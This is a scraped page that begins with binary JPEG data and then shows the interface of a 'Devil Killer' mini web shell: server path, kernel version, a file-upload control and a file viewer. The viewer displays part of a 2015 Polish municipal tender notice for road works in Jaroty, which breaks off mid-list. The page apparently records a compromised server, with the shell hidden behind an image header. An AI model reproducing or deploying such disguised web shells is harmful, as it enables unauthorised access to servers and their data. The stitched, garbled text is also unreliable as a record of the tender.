JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150420/55031-N-2015.html

<p class="kh_header"><b>Stawiguda: Budowa ul. Porcelanowej w Jarotach.
CZĘŚĆ I - Budowa nawierzchni ul. Porcelanowej - ETAP I
CZĘŚĆ II - Budowa nawierzchni ul. Porcelanowej - ETAP II</b><br>
<b>Numer ogłoszenia: 55031 - 2015; data zamieszczenia: 20.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stawiguda , ul. Olsztyńska 10, 11-034 Stawiguda, woj. warmińsko-mazurskie, tel. 089 5126475, faks 089 5126910.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stawiguda.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ul. Porcelanowej w Jarotach.
CZĘŚĆ I - Budowa nawierzchni ul. Porcelanowej - ETAP I
CZĘŚĆ II - Budowa nawierzchni ul. Porcelanowej - ETAP II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane pn. Budowa ul. Porcelanowej w Jarotach. CZĘŚĆ I - Budowa nawierzchni ul. Porcelanowej - ETAP I. ETAP 1 - odcinek drogi długości 135 m począwszy od punktu E prim (od miejsca, w którym kończy się  istniejąca droga). Roboty budowlane obejmują budowę drogi w miejscowości Jaroty na działce 291/15 oznaczonej na planie sytuacyjnym literami E prim-G. ETAP 1 - odcinek drogi długości 135 m począwszy od punktu E prim  (od miejsca, w którym kończy się  istniejąca droga). Zakres zadania nie obejmuje wykonania chodników i oświetlenia. Nawierzchnia  przewidziana na ruch kategorii KR-1 z kostki betonowej brukowej szarej gr. 8 cm na podsypce cementowo - piaskowej  i podbudowie z kruszywa łamanego stabilizowanego mechanicznie. Odwodnienie nawierzchni dróg poprzez spadki poprzeczne i podłużne do wpustów kanalizacji deszczowej w drogach. Główny rurociąg kanalizacji deszczowej został już wykonany. W ramach niniejszego zadania należy wykonać odprowadzenie wód deszczowych do istniejącego rurociągu poprzez wpusty uliczne żeliwne deszczowe z osadnikami zlokalizowane w jezdni ulicy. 2. Zakres, sposób wykonania i szczegółowy opis przedmiotu zamówienia wynikający z art. 31 ustawy Pzp stanowi dokumentacja projektowa na wykonanie robót budowlanych, na którą składa się: 2.1. Dokumentacja projektowa budowy dróg  - stanowiąca załącznik Nr 1 do pozwolenia na budowę   Sta/155/2007 z dnia 24.09.2007r. wydanego przez Starostwo Powiatowe w Olsztynie  - [załącznik nr  10  do siwz], który to dokument jest integralną częścią SIWZ oraz 2.2. specyfikacje techniczne wykonania i odbioru robót  [załącznik nr 11 do siwz], który to dokument jest integralną częścią siwz, a także 2.3. przedmiar robót - element pomocniczy - [załącznik nr 12 do SIWZ]. Zamawiający zastrzega, że w przypadku stwierdzenia przy wykonywaniu wykopu i potwierdzenia przez inspektora nadzoru występowania warstw podbudowy nadających się do wykorzystania, roboty te zostaną odpowiednio zdjęte z zakresu wykonania Wykonawcy, a wynagrodzenie Wykonawcy zostanie odpowiednio pomniejszone. 3. CZĘŚĆ II- Budowa nawierzchni ul. Porcelanowej - ETAP II. ETAP II - pozostała część drogi z placem manewrowym w formie ronda. Roboty budowlane obejmują budowę drogi w miejscowości Jaroty na działce 291/15 oznaczonej na planie sytuacyjnym literami E prim -G. ETAP II - pozostała część drogi z placem manewrowym w formie ronda. Zakres zadania nie obejmuje wykonania chodników i oświetlenia. Nawierzchnia  przewidziana na ruch kategorii KR-1 z kostki betonowej brukowej szarej gr. 8 cm na podsypce cementowo - piaskowej  i podbudowie z kruszywa łamanego stabilizowanego mechanicznie. Odwodnienie nawierzchni dróg poprzez spadki poprzeczne i podłużne do wpustów kanalizacji deszczowej w drogach. Główny rurociąg kanalizacji deszczowej został już wykonany. W ramach niniejszego zadania należy wykonać odprowadzenie wód deszczowych do istniejącego rurociągu poprzez wpusty uliczne żeliwne deszczowe z osadnikami zlokalizowane w jezdni ulicy. 4. Zakres, sposób wykonania i szczegółowy opis przedmiotu zamówienia wynikający z art. 31 ustawy Pzp stanowi dokumentacja projektowa na wykonanie robót budowlanych, na którą składa się: 4.1. Dokumentacja projektowa budowy dróg  - stanowiąca załącznik Nr 1 do pozwolenia na budowę   Sta/155/2007 z dnia 24.09.2007r. wydanego przez Starostwo Powiatowe w Olsztynie  - [załącznik nr  10  do siwz], który to dokument jest integralną częścią SIWZ oraz 4.2. specyfikacje techniczne wykonania i odbioru robót  [załącznik nr 11 do siwz], który to dokument jest integralną częścią siwz, a także 4.3. przedmiar robót - element pomocniczy - [załącznik nr 12 do SIWZ]. Zamawiający zastrzega, że w przypadku stwierdzenia przy wykonywaniu wykopu i potwierdzenia przez inspektora nadzoru występowania warstw podbudowy nadających się do wykorzystania, roboty te zostaną odpowiednio zdjęte z zakresu wykonania Wykonawcy, a wynagrodzenie Wykonawcy zostanie odpowiednio pomniejszone.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. 2013r. poz.907 z późn. zm.). Ewentualne zamówienie uzupełniające udzielone zostanie w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy robót budowlanych i polegać będzie na powtórzeniu tego samego rodzaju robót.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.31.20-6, 45.23.24.40-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości : CZĘŚĆ I - 1 616,00 zł z dopiskiem CZĘŚĆ I - Budowa nawierzchni ul. Porcelanowej - ETAP I; CZĘŚĆ II - 4 704,00 zł z dopiskiem CZĘŚĆ II- Budowa nawierzchni ul. Porcelanowej - ETAP II. Wykonawca wnosi wadium w jednej lub kilku następujących formach: 1) w pieniądzu, sposób przekazania przelew pieniężny na konto Zamawiającego 1)	w pieniądzu, sposób przekazania przelew pieniężny na konto Zamawiającego z dopiskiem: CZĘŚĆ I - Budowa nawierzchni ul. Porcelanowej - ETAP I *) CZĘŚĆ II- Budowa nawierzchni ul. Porcelanowej - ETAP II *). *) Wykonawca dopisuje część, w której bierze udział. 98 8823 0007 2001 0100 1973 0008 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 3)    gwarancjach bankowych; 4)   gwarancjach ubezpieczeniowych; 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.) sposób przekazania: w siedzibie zamawiającego - pokój nr 14 Przy czym za termin wniesienia wadium w formie pieniądza uważa się za skutecznie wniesione, jeżeli przed upływem terminu składania ofert znajdzie się ono na koncie Zamawiającego.Termin wniesienia wadium w wybranej formie- przed terminem składania ofert tj. do dnia 05.05.2015r. godz. 11 : 45. Wadium musi obejmować cały okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający informuje, że  działalność prowadzona  na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.Zamawiający  korzysta z § 1 ust. 4 Rozporządzenie Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy i określa roboty budowlane, których  dotyczy obowiązek wskazania przez Wykonawcę w wykazie i złożenia poświadczeń, że zostały wykonane w sposób należyty oraz że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone: Część I Wykonawca wybudował: minimum dwie roboty budowlane (drogi, ulice, parkingi, ścieżki rowerowe, chodniki itp.) o nawierzchni z kostki betonowej o powierzchni łącznej nie mniejszej niż 600 m2. Część II Wykonawca wybudował: minimum dwie roboty budowlane (drogi, ulice, parkingi, ścieżki rowerowe, chodniki itp.) o nawierzchni z kostki betonowej o powierzchni łącznej nie mniejszej niż 1200 m2. Ocena warunku nastąpi na podstawie załączonego przez Wykonawcę do oferty: wykazu robót budowlanych  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania- załącznik nr 4. Zamawiający  korzysta z § 1 ust. 4 Rozporządzenie Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy i określa roboty budowlane, których  dotyczy obowiązek wskazania przez Wykonawcę w wykazie i złożenia poświadczeń, że zostały wykonane w sposób należyty oraz że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Dla wykonawców zagranicznych wartość podana w obcej walucie zostanie przeliczona wg. Średniego kursu walut banku NBP.  Jeżeli Wykonawca nie może wykazać, że spełnia warunki udziału w postępowaniu, o którym mowa Zamawiający uzna, że Wykonawca spełnia owe warunki, gdy wykaże  że polega na wiedzy i doświadczeniu innych podmiotów do wykonania zamówienia, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia z wykorzystaniem wzorów formularzy dotyczących zobowiązań - załącznik nr 4A. Wykonawca biorący udział w kilku częściach musi wykazać spełnienie warunku dla każdej części, w której bierze udział. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla CZĘŚĆI I i II  Wykonawca wykaże, że: Wykonawca dysponuje narzędziami w celu realizacji zamówienia tj. co najmniej jedną koparką i jedną zagęszczarką. Ocena warunku nastąpi na podstawie złączonych przez Wykonawcę do oferty: wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy  robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami - załącznik nr 6. Jeżeli Wykonawca nie może wykazać, że spełnia warunki udziału w postępowaniu, o którym mowa Zamawiający uzna, że Wykonawca spełnia owe warunki, gdy wykaże  że polega na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia                                           z wykorzystaniem wzorów formularzy dotyczących zobowiązań - załącznik nr 6A. Wykonawca biorący udział w kilku częściach musi wykazać spełnienie warunku dla każdej części, w której bierze udział. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla CZĘŚĆI I i II Wykonawca wykaże, że: dysponuje osobami do wykonania zamówienia tj. dysponują osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie na stanowiskach: Kierownik Budowy - minimalne wymagania Doświadczenie na funkcji kierownika budowy na minimum jednym zadaniu obejmujących budowę  lub przebudowę nawierzchni z kostki betonowej. Wykształcenie wyższe lub średnie. Uprawnienia budowlane w specjalności drogowej  wydane na podstawie obowiązujących przepisów ustawy z dnia 7 lipca 1974r. Prawo budowlane (Dz. U. z 2010r.  nr 243 poz. 1623 z późn. zm) lub odpowiadające im uprawnienia otrzymane według wcześniej obowiązujących przepisów Prawa budowlanego. Kierownika robót sanitarnych minimalne wymagania. Doświadczenie na funkcji kierownika budowy lub robót na minimum jednym zadaniu obejmującym budowę kanalizacji deszczowej lub sanitarnej. Wykształcenie wyższe lub średnie. Uprawnienia budowlane w specjalności w specjalności instalacyjnej w zakresie sieci kanalizacyjnych wydane na podstawie obowiązujących przepisów ustawy z dnia 7 lipca 1974r. Prawo budowlane (Dz. U. z 2010r.  nr 243 poz 1623 z późn. zm.) lub odpowiadające im uprawnienia otrzymane według wcześniej obowiązujących przepisów Prawa budowlanego. Ocena warunku nastąpi na podstawie złączonych przez Wykonawcę do oferty dokumentów: wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami- załącznik nr 5, oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień- Załącznik 5B. Jeżeli Wykonawca nie może wykazać, że spełnia warunki udziału w postępowaniu, o którym mowa Zamawiający uzna, że Wykonawca spełnia owe warunki, gdy wykaże  że polega na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówieni z wykorzystaniem wzorów formularzy dotyczących zobowiązań - załącznik nr 5A. Zamawiający dopuszcza wskazanie tej samej osoby na funkcji kierownika budowy oraz kierownika robót sanitarnych  w przypadku złożenia oferty przez Wykonawcę na kilka części. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że: dla CZĘŚĆI I  znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. posiada środki finansowe lub mają zdolność kredytową na kwotę  nie niższą niż: 100 000,00 zł, dla CZĘŚĆI II  znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. posiada środki finansowe lub mają zdolność kredytową na kwotę  nie niższą niż: 200 000,00 zł. Ocena warunku nastąpi na podstawie złączonych przez Wykonawcę do oferty dokumentów: informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku. Jeżeli wykonawca wykazując spełnianie warunku, o którym mowa w art. 22 ust. 1 pkt 4 ustawy, polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, wymaga się przedłożenia informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej dotyczącej tych podmiotów potwierdzający spełnienie warunku. Wykonawca biorący udział w kilku częściach przedstawi dokumenty na sumę wartości określonych na potwierdzenie warunku w danych częściach, w których bierze udział. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

